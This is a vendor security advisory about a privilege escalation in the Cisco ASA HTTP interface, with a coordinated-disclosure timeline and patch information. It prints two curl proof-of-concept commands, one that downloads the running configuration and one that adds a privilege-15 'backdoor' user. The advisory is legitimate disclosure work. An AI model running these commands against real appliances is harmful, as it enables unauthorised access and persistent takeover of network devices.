Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Cisco Adaptive Security Appliance HTTP Privilege Escalation

High

Synopsis

While examining a Cisco Adaptive Security Appliance, Tenable discovered a privilege escalation vulnerability in the HTTP interface. When command authorization is not enabled, an authenticated remote unprivileged (level 0 or 1) user can change or download files as well as upload or replace software images on the appliance.

A simple proof of concept for downloading the running configuration follows:

curl --basic -u notadmin -p -k http://[ip]/admin/system/running-config

The following proof of concept allows an unprivileged user to add a new privileged user to the running configuration:

curl --basic -u notadmin -p -k -X “POST” --data-binary “username fourthuser password backdoor privilege 15” “http://[ip]/admin/config”

Solution

Cisco has released an advisory and patches. You can find full details linked below. Also, enabling command authorization is a recommended best practice.

Disclosure Timeline

09/12/18 - Bug found.
09/17/18 - Vulnerabilities reported to [email protected] via encrypted email. 90 day is December 17, 2018.
09/17/18 - Cisco responds that Tenable sent with an old invalid key.
09/17/18 - Tenable, chastened, resends with the proper key.
09/17/18 - Cisco assigns CSCvm53531, CSCvm53537, CSCvm53539, and PSIRT-0723370376. Cisco states, "The last Cisco PSIRT publishing date of 2018 is November 7". Cisco asks for "joint disclosure" on Feb. 9, 2019.
09/17/18 - Tenable responds that Feb. 9, 2019 is unacceptable due to strict disclosure policy.
09/18/18 - Cisco replies with a handful of dates that could work. Also, having trouble reproducing all the results and asks for some command output.
09/18/18 - Tenable says Dec. 12 or Dec. 19 are fine. Sends additional output requested by Cisco.
09/19/18 - Cisco replies with additional questions about Tenable's write up.
09/19/18 - Tenable replies with explanations.
09/21/18 - Cisco confirms the vulnerabilities.
10/12/18 - Tenable asks for an update.
10/12/18 - Cisco says the team is still looking into it.
11/1/2018 - Tenable reminds Cisco that 45 days remain.
11/1/2018 - Cisco acknowledges.
12/7/2018 - Tenable asks for an update.
12/10/2018 - Cisco asks Tenable for coordinated disclosure on 12/19.
12/10/2018 - Tenable agrees.
12/12/2018 - Cisco assigns a CVE and shares some publication details. Asks Tenable to share their advisory.
12/13/2018 - Tenable acknowledges the request.
12/18/2018 - Cisco reminds Tenable of upcoming publication and shares the link.
12/18/2018 - Tenable shares a partial first draft of the advisory and asks for the list of fixed versions.
12/18/2018 - Cisco suggests a correction to the draft and provides the list of patched versions.
12/18/2018 - Tenable thanks Cisco.
12/19/2018 - Cisco publishes their advisory.
12/19/2018 - Tenable publishes their advisory.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2018-15465
Tenable Advisory ID: TRA-2018-46
Credit:
Ken Johnson
CVSSv2 Base / Temporal Score:
7.9 / 6.5
CVSSv2 Vector:
AV:N/AC:M/Au:S/C:P/I:P/A:N
Nessus Plugin ID: 119844
Affected Products:
Cisco Adaptive Security Appliance before 9.4.4.29, 9.6.4.20, 9.8.3.18, 9.9.2.36 and 9.10.1.7
Risk Factor:
High

Advisory Timeline

12/19/2018 - [R1] Initial Release

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training